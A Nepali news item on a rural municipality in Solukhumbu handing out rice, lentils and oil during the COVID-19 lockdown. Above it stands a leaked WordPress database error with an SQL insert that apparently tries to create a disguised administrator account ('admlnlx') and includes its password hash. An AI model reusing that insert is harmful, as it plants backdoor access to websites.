WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEvo9opLaQ3uckjwEoX/JMV/6VN8Yo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:26:11', '', 'admlnlx', 'admlnlx')
बैशाख २७, काठमाडौं- माप्य दुधकोशी गाउँपालिका सोलुखुम्बुले शनिबार वडा नंबर ७, वाकुबाट राहत वितरण सुरु गरेको छ ।
वडा नंबर ७ का दुई सय ६१ घरधुरीलाई राहत बाडिएको गाउँले सहकर्मी बलबहादुर राईले जानकारी दिएका छन् । गाउँपालिकाका उपाध्यक्ष जुनितामाया मगर र वडा नंबर ७ का वडा अध्यक्ष सगुजित राईको नेतृत्वमा राहत वितरणको काम सुरु गरिएको हो । वडा नंबर ७ का बाँकि सय घरपरिवारलाई भने भोलि (आइतबार) राहत बाड्ने र त्यसलगतै वडा नंबर ६ वाकुका जनतालाई राहत वितरण गरिने सहकर्मी राईले जानकारी दिएका छन् । प्रति घर ३० केजी चामल, दुई केजी दाल र एक लिटर तेल राहतस्वरूप बाडिएको छ ।

राहत वितरण अभियानमा वडा नंबर ६ का वडा अध्यक्ष दिनेशकुमार राई, नेकपा माप्य दुधकोशीका अध्यक्ष गौरव राई र अन्य जनप्रतिनिधिहरुको सहभागी रहेको जनाइएको छ । कोरोना भाइरस (कोबिड नाइन्टिन) को प्रकोपबाट बच्न सरकारले देशव्यापी ‘लक डाउन’ गरेपछि ब्यापार, व्यवसाय आदि सञ्चालन गर्न बन्द भएपछि विपन्न परिवारलाई गाउँपालिकाले राहतको लागि खाद्यपदार्थ दिन थालेको हो ।